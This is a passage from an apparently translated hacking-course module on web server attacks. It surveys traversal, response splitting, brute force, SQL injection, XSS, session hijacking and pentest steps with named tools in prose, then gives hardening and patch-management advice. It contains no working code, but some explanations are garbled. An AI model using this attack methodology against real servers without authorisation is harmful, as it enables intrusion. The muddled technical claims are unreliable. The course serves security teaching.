nevertheless this TELNET service is open, if an audit is applied it is known that telnet is
not necessary when using ssh, this may vary.
What impact does the server receive after an attack?

The impact that a server will receive after being attacked, can vary depending on the psychology
of the computer delinquent but studies of most of the attacks were made and what they did in the
compromised servers and can be "predicted" what intentions can reach have an attacker and we
will see in details below:

 Compromise user accounts: Attacks on the web server are mainly focused on the
commitment of the user's account. If the attacker can compromise a user account, the
attacker can get a lot of useful information, either credit cards or some user information
to extort or prepare more attacks.
 Alteration of information: the attacker can alter or delete data from the server or
database. He or she can even install malicious software to attack internal employees of
the organization.
 Web design defacement: the computer criminal can change the design of the website at
will, replacing the original design with his own to show an intimidating message to
website visitors.
 Secondary attacks: when the attacker manages to have control of the web server
(primary attack), it can implement malicious javascript in the website and make attacks to
the users or visitors of the website, this is called a secondary attack.
 Data theft: data is one of the main assets of the company. Attackers can gain access to
confidential company data such as the source code of a particular program and steal it,
this is called an intellectual property theft.
 Root access: this is when an attacker manages to scale privileges and get the root user,
therefore he gets administrator access to the system with that he can search to have access
to the whole network.

Website defacement

This type of attacks is one of the most viewed or popular, it is the "website defacement" is to
make a change in the main page of a website to show a message to visitors, is usually a threat or
simply a name of a group or individual delinquent driven for different reasons, in this way takes
the public "cause" that has it.

There is also often political propaganda or content offensive to users, in 2007 there was a series
of computer attacks between a conflict of 2 nations is Estonia and Russia, the conflict was
carried out by a disagreement about the statue of the Bronze Soldier of Tallin, among the
computer attacks was the disfigurement of websites in favor of Russia and to maintain the
position of the statue in the same place, in this example the attacks were politically motivated.
Default configuration, in web servers
Web servers have several vulnerabilities related to configuration, applications, files, scripts or
web pages. Once the attacker finds these vulnerabilities, such as remote access to the application,
these become the doors for the attacker to enter a company's network illegally.

These holes in the server can help attackers to circumvent user authentication. The
misconfiguration of the server refers to the configuration flaws in the web infrastructure that can
be exploited to launch several attacks against web servers, such as the director's path (directory
traversal), server intrusion and data theft. Once detected, these problems can be exploited easily
and result in the local commitment of a website.

 Remote access to a server (SSH), are usually the most common access points in many
cases bad passwords are chosen and a limit is not configured you failed attempts, this
way you can execute brute force attacks.
 Unnecessary services running and open to the public, this can give an advantage to the
computer criminal.
 Messages or valuable information for programmers (debugs) available to the general
public.
 Anonymous and default users and passwords
 Common examples: the banner that provides information about the web server version
(Server) and also usually shows information about the background language (X-
Powered-By):

Directory traversal attacks

Web servers are designed in such a way that public access is limited to some extent. The
directory path is the exploitation of HTTP through which attackers can access restricted
directories and execute commands outside the root directory of the web server by manipulating a
URL. Attackers can use the trial and error method to navigate outside the root directory and
access sensitive information on the system, or execute shell commands from the server's own
operating system.

HTTP response split attack


An HTTP response attack (HTTP Response splitting attack) is a web-based attack where a server
is tricked by injecting new lines into the response headers along with arbitrary code. Cross-Site-
Scripting (XXS), Cross-Site-Request-Forgery (CSRF) and SQL injection are some examples of
this type of attacks. The attacker alters a single request to appear and be processed by the web
server as two requests. The web server in turn responds to each request. This is achieved by
adding header response data in the input field. An attacker passes malicious data to a vulnerable
application the first response to redirect the user to a malicious website, while the other answers
will be discarded by the web browser.

 Request and normal response:

In this case we see a normal web application, which has the parameter 'lang' in which you
can configure the website's language
 Request injected by an attacker, and vulnerable response:

Taking advantage of the lang parameter, the attacker takes data from the previous
response and injects them to manipulate the response of the server and return HTML
content created by the attacker. (Images source)

Web cache poisoning attack


Web Cache Poisoning (Web Cache Poisoning) is an attacker that performs in contrast to the
reliability of an intermediate web cache source, in which honest content cached for a random
URL is exchanged with content infected. Users of the web cache source can unknowingly use the
poisoned content instead of the true and secure content by requiring the required URL through
the web cache.

An attacker forces the web server's cache memory to remove the actual contents of the cache and
sends a request specially designed to store it in the cache.

HTTP response hijacking


The HTTP response hijacking (* HTTP response hijacking *) is achieved with a response split
request. In this attack, initially the attacker sends a response dividing the requests to the web
server, the server divides the response in two and sends the first response to the attacker and the
second response to the victim. Upon receiving the response from the web server, the victim
requests the service by giving credentials. At the same time, the attacker requests the index page,
then the web server sends the response of the victim's request to the attacker and the victim
remains uninformed.

Brute force against SSH

The SSH protocols are used to create an SSH tunnel encrypted between two hosts to transfer
unencrypted data through an insecure network, in order to perform an attack on SSH, first the
attacker scans the entire SSH server to identify possible vulnerabilities. With the help of a brute
force attack, the attacker wins the login credits. Once the attacker obtains the SSH login
credentials, it uses the same SSH tunnels to transmit malware and other vulnerabilities to victims
without being detected.

Attack: Man in the middle


A man attack in the middle (Man in the middle) is a method where an intruder intercepts or
modifies the message that is exchanged between the user and the web server through espionage
or intrusion into a connection. This allows an attacker to steal a user's confidential information,
such as online banking details, user names, passwords, etc. Transferred via the Internet to the
web server. The attacker attracts the victim to connect to the web server by posing as a proxy. If
the victim believes and accepts the attacker's request, then all communication between the user
and the web server passes through the attacker. Therefore, the attacker can steal sensitive
information from the user.

Deciphering passwords
Most computer criminals only start with the decryption of passwords, once the password is
decrypted, the attacker can log on to the network as authorized persons. Attackers use different
methods such as social engineering, identity theft, phishing, trojans or viruses, wiretaps,
keylogging, a brute-force attack, a dictionary attack, etc. To decrypt passwords.

The attackers mainly point to:

 Attacks against web forms authentication


 Access by SSH
 FTP servers
 SMTP servers
 Shared servers

Web server password decryption techniques

Passwords can be decrypted manually or with automatic tools such as Cain & Abel, Brutus, THC
Hydra, etc. The attackers follow several techniques to decipher the password:

 Guess: a common method of cracking used by attackers is to guess passwords either by


humans or by automated tools provided with dictionaries. Most people tend to use the
names of their pets, names of their pets, plate numbers, dates of birth or other weak
passwords like "password", "administrator". So that they can easily remember them, the
same thing allows the attacker to decipher the guessing passwords.
 Dictionary Attack: A dictionary attack is a method that has predefined words of various
combinations, but this might also not be effective if the password consists of special
characters and symbols, but compared to a brute-force attack This consumes less time.
 Brute force attack: in the brute force method, all possible characters are tested, for
example, capitals from "A to Z" or numbers from "0 to 9" or lowercase "* from a to Z*".
But this type of method is useful for identifying passwords of one or two words. While if
a password consists of uppercase and lowercase letters and special characters, it can take
months or years to decipher the password, which is practically impossible.
 Hybrid attack: a hybrid attack is more powerful because it uses a dictionary attack and
brute force. It also consists of symbols and numbers. Cracking passwords becomes easier
with this method.

Attacks against web applications


Vulnerabilities in web applications that run on a web server provide a broad attack path for web
server commitment, so if a computer criminal does not want to attack the server directly, it can
look for vulnerabilities in the web application that works on the same.

 Directory path: is an HTTP exploit through which attackers can access restricted
directories and execute commands outside the '* root *' directory of the web server by
manipulating a URL.
 Modification of parameters/forms: this type of manipulation attack is intended to
manipulate the parameters exchanged between the client and the server to modify the
data of the applications, such as the user's credentials and permissions, the price and the
quantity of products, etc.
 Infiltration of cookies: is the method of poisoning or alteration of the cookie of the clint.
The phases where most attacks are made when sending a cookie from the client side to
the server. Persistent and non-persistent cookies can be modified using different tools.
 Command injection attacks: is an attack method in which a hacker alters the content of
the web page by using HTML code and identifies form fields that lack valid restrictions.
 Buffer overflow attacks: Most web applications are designed to maintain a certain
amount of data. If that amount is exceeded, the application may crash or show some other
vulnerable behavior. The attacker uses this advantage and floods the applications with too
much data, which in turn causes a buffer overflow attack (Buffer Overflow).
 Cross-scripting attacks (XSS): is a method in which an attacker injects HTML tags or
javascript scripts into a target website, to make an attack on the user or visitor thereof.
 Denial of Service (DoS) attack: is a form of attack method designed to terminate the
operations of a website or a server and make it unavailable to intentional users, damaging
the availability of the server.
 Non-validated entry and file injection attacks: Invalid attack and file injection attacks
refer to attacks that are made by providing a non-validated entry that allows you to inject
files into a web application, example a web form where you can upload a profile picture,
in the back-end there is no validation of files that can be uploaded, the attacker could
upload a PDF with malware.
 Cross-Site Request Forgery Attack (CSRF): The user's web browser is requested by a
malicious web page to send requests to a malicious website where several vulnerable
actions are performed, which are not performed by the user . This type of attack is
dangerous in the case of financial websites.
 SQL injection: is a code injection technique that uses the security vulnerability of a
database for attacks, the attacker injects malicious code into the strings that are then
passed to the SQL server for execution, example: a search box on a website is not being
validated what the user enters and goes directly to a SQL query, the attacker can directly
enter SQL code and know what is inside the database.
 Session hijacking: is an attack in which the attacker exploits, steals, predicts and
negotiates the true valid web session control mechanism to access the authenticated parts
of a web application.

Methodology of attack against a Server


As we saw in previous modules of this computer security course, the process to obtain access or
hack a web server is the same as that applied to an objective system. That is, gather information
passively and actively then plan an attack with the information obtained and finally launch the
attack, then we will see the steps to perform a security audit aimed at web servers.

I remind you that I will not go into much depth in each phase, since in the first module of the
computer security course We have already seen what each step that is executed to perform a
security audit is about.

Gather information

Gathering information involves gathering information about the target company, attackers search
the Internet, newsgroups, bulletin boards, etc. To obtain information about the company.
Attackers use: Whois, traceroute, active whois, etc.

Tools and query Whois databases for details such as a domain name, an IP address or a stand-
alone system number.

A common case to start obtaining information from a website is: search the file 'robots.txt',
usually found in the root of the server (www.example.com/robots.txt). The file robots.txt
contains the list of directories and files on the web server that the owner of the website wants to
hide from web crawlers (Search engines (eg: Google)). The attacker can simply request the
robots.txt file from the URL and retrieve the confidential information, such as the root directory
structure, the content management system information, etc.

As we see in the image the specific webmaster that folders search engines should ignore, in this
case the attacker could see an interest in the directory '/admin'.

Get information about services

The purpose of the footprinting is to collect details of the account, operating system and other
software versions, server names and details of the database schema and as much information as
possible about the security aspects of a web server or target network. The main objective is to
know their remote access capabilities, ports and open services, and the security mechanisms
implemented.
Information sought: the name of the server, the type of server, operating systems, applications
running, etc. Examples of tools used to perform footprinting include ID Server, Netcraft, etc.

This step is usually mixed with the enumeration for that we perform an active scan against the
server to have specific and technical information about it, it is ideal for this tool Nmap.

Vulnerability scan

Vulnerability analysis is a method to determine several vulnerabilities and incorrect


configurations of a web server or target network. Vulnerability scanning is done with the help of
several automated tools known as vulnerability scanners.

The exploration of vulnerabilities allows to determine the vulnerabilities that exist in the web
server and its configuration. Therefore, to determine if the web server is exploitable or not,
tracking techniques are adopted in network traffic to discover the active systems, network
services, applications and vulnerabilities present.

In addition, attackers test the web server infrastructure for any erroneous configuration, outdated
content, and known vulnerabilities. Several tools are used to scan vulnerabilities such as: Nessus,
Expose, etc.

Session hijacking

Session hijacking is possible once the current session of the client is identified, the attacker can
take over full control of the user's session once the user establishes authentication with the
server. With the help of the sequence number prediction tools, attackers hijack the session.

The attacker, after identifying the open session, predicts the sequence number of the next packet
and then sends the data packets before the legitimate user sends the response with the correct
sequence number. Therefore, an attacker makes a session hijacking, in addition to this technique,
you can also use other session hijacking techniques such as session fixation, session hijacking,
XSS, etc. The most used tools for session hijacking are: Burp Suite, Hamster, Firesheep.

Countermeasures to protect a Web Server


Now let's see a little about possible countermeasures that are recommended to follow when
putting a server into production, that is, giving access to the Internet. It should be noted that
these countermeasures are a set of good practices, there is the possibility that some computer
criminal will achieve equal access to your server, since computer security is a day-to-day field,
but thanks to the standards of countermeasures we can minimize the damage that could cause an
attacker, so it is vital to take into account the security when exposing a server to the Internet.
Recommended reading: How to build a secure network, introduction to networks and their
security..

Countermeasures: Update and security patches

 Search for existing vulnerabilities, apply patches and update the server software
regularly.
 Before applying any service pack, patch or security patch, read and review all relevant
documentation
 Apply all updates, regardless of their type, as needed
 Test patches and revisions in a representative non-production environment before
implementing them in production.
 Ensure that server interrupts are scheduled and that there is an available backup (backup)
 Have a backslide plan that allows the system and the company to return to their original
state, before the failed implementation.
 Schedule periodic updates of the service package as part of maintenance operations.

Countermeasures: Protocols and services

 Block all unnecessary ports, traffic from the * Internet Control Message Protocol *
(ICMP).
 Improve the TCP/IP stack and consistently apply the latest software patches and updates
to the system software
 If you use insecure protocols such as Telnet, POP3, SMTP, FTP, take appropriate
measures to provide secure authentication and communication, for example, by using
IPSec policies.
 If remote access is needed, make sure that the remote connection is secured correctly, by
using tunnel and encryption protocols
 Disable WebDAV if the application does not use it or keep it secure if necessary

Countermeasures: Users accounts

 Remove all unused modules and application extensions


 Disable unused default user accounts, created during the installation of an operating
system or service.
 When creating a new web root directory, grant the appropriate NTFS permissions (the
least possible).
 Remove unnecessary database users and stored procedures, and follow the principle of
minimum privileges for the database application to defend against poisoning by SQL
queries.
 Reduce the speed of brute force and dictionary attacks with secure password policies, and
audit and alert logon failures.
 Run processes using less privileged accounts, as well as less privileged service and user
accounts

Countermeasures: Files and server directories


 Remove sensitive configuration information within the bytecode
 Avoid correlating virtual directories between two different servers or in a network
 Check and frequently check all network service records, website access logs, database
server logs and operating system logs.
 Disable the publication of directory listings
 Eliminate the presence of non-web files, such as storage files, backup copies, text and
header / inclusion.
 Disable the service of certain types of files by creating a resource allocation
 Make sure there is a web application or files for websites and scripts in a partition or
drive other than the operating system, the logs and any other system file.

How to defend against web server attacks

1. Ports

 Audit ports on the server regularly to ensure that an insecure or unnecessary service is not
active on your web server.
 Limit incoming traffic to port 80 for HTTP and port 443 for HTTPS (SSL)
 Encrypt or restrict intranet traffic

2. Server Certificates

 Make sure that the data intervals of the certificate are valid and that the certificates are
used for the intended purpose
 Make sure that the certificate has not been revoked and that the public key of the
certificate is valid all the way to a reliable root authority

3. Access security code

 Implement secure coding practices


 Restrict the configuration of the code access security policy

4. Web server

 Avoid giving information about directories, when a specific resource is not found
 Disable the technical specifications of the server, this way we do not facilitate the banner
grabbing

Good practices recommended

 Use a dedicated machine as a web server (VPS)


 Create URL mappings to internal servers with caution
 Follow-up of session ID of the server side of user and connections of coincidence with
timestamps, IP addresses, etc.
 If a database server, such as the MySQL server, is to be used as a back-end database,
install it on a different server.
 Use security tools provided with web server software and scanners that automate and
facilitate the security process of a web server.
 Physically protect the web server machine in a secure machine room, or hire a reputable
cloud server (ex: DigitalOcean)
 Do not connect a web server to the Internet until it is fully reinforced
 Do not allow anyone to log in locally on the machine, except the administrator
 Limit server functionality to support web technologies that will be used
 Monitor and filter the incoming and outgoing traffic of the web server.
 Implement a WAF (Web application Firewall) to filter the most attacks used by attackers,
it is advisable to use a paid version with professional countermeasures.

Patch Management

A patch is a program used to make changes to software installed on a computer. Patches are used
to correct errors, solve security problems, add functionality, etc. A patch is a small software
designed to solve problems, security vulnerabilities and errors, and to improve the usability or
performance of a computer program or its support. A patch can be considered a repair work to
a programming problem.

A revision is a package that includes several files used specifically to address various software
problems. Revisions are used to correct errors in a product. Providers update users about the
latest revisions by email or they can be downloaded from the official website. The revisions are
an update to solve a specific client problem and are not always distributed outside the client's
organization. Users can receive notifications by email or through the provider's website. Reviews
are sometimes packaged as a bundle, arrays called bundle reviews or service bundle.

What is Patch Management?

Patch management is a process used to ensure that appropriate patches are installed on a
system and help correct known vulnerabilities. It is a good definition of what patch management
is, now let's see the mechanism of it:

1. Detect: it is very important to always detect the missing security patches through the
appropriate detection tools. If there is any delay in the detection process, the chances of
malicious attacks are very high.
2. Evaluate: once the detection process is finished, it is always better to evaluate several
problems and associated factors, related to them and better implement those strategies
where problems can be reduced or eliminated drastically.
3. Acquire: the appropriate patch required to solve the problems should be downloaded.
4. Test: it is always suggested to first install the required patch in the test system instead of
the main system (production) since this provides the opportunity to verify the various
consequences of the update in it.
5. Deployment: the patches must be deployed in the system with the utmost caution, so that
the system is not affected by any problems caused by the new patch.
6. Keep: It is always useful to subscribe to receive notifications about several possible
vulnerabilities as they are reported.

Patch management: recommended tools

 Microsoft Baseline Security Analyzer (MBSA): MBSA allows you to identify missing
security updates and common security settings. It is a tool designed for the IT
professional that helps small and medium enterprises to determine their security status in
accordance with Microsoft's security recommendations and offers a specific remediation
guide. Improve your security management process by using MBSA to detect common
security configurations and missing security updates in your computer systems.
 ZENworks Patch Management (Micro Focus)
 Endpoint Security Patch Management (Ivanti)

Pentesting: server hacking

Web server penetration tests begin with the gathering of as much information as possible about
an organization, from its physical location to the operating environment, in order to successfully
perform a pentest against the target web server.

 The following are the steps taken by the pentester to penetrate the web server *:

1. Search in open sources to obtain information about the objective: try to collect as
much information as possible about the web server of the target organization, from its
physical location to the operating environment. You can get this information from the
Internet, newsgroups, bulletin boards, etc.
2. Carry out social engineering: perform social engineering techniques to gather
information, such as human resources, contact details, etc. That can help in the
authentication tests of the web server. You can also perform social engineering through
social networking sites or handling garbage containers.
3. Check whois databases: you can use the Whois database query tools like Whois,
Traceroute, Active Whois, etc. For details about the destination, such as domain name, IP
address, administrative contacts, autonomous system number, DNS, etc.
4. Document all the information about the objective: you must document all the
information obtained from the various sources.
5. Perform scanning in search of information: to collect information such as the name of
the server, the type of server, operating systems, applications running, etc. Using tools
like ID Serve, httprecon and Netcraft.
6. Perform Website Tracking: Perform Website Tracking to collect specific information
from web pages, such as email addresses. You can use tools like httprint and Metagoofil
to track the website.
7. List the web directories: list the web server directories to extract important information,
such as web functionalities, login forms, etc. You can do it using a tool such as
DirBuster.
8. Perform the vulnerability scan: perform a vulnerability scan to identify weaknesses in a
network using tools such as Nessus, etc. And determine if the system can be exploited.
9. Perform pentesting: perform different types of attacks either manually, or with
automated tools such as Metasploit, etc. To achieve access to the target web server.
10. Document: make a documentation of the entire process that you did and how you
obtained access to the server, to then offer security countermeasures.

This module ends here, I hope you have been able to learn the objectives of this module. This
course has an effort and it is free, I would like you to share it in your social networks or hacking
forums so that more people can see it, this course will advance to reach several modules, you can
subscribe if you want to know the progress of the course

You might also like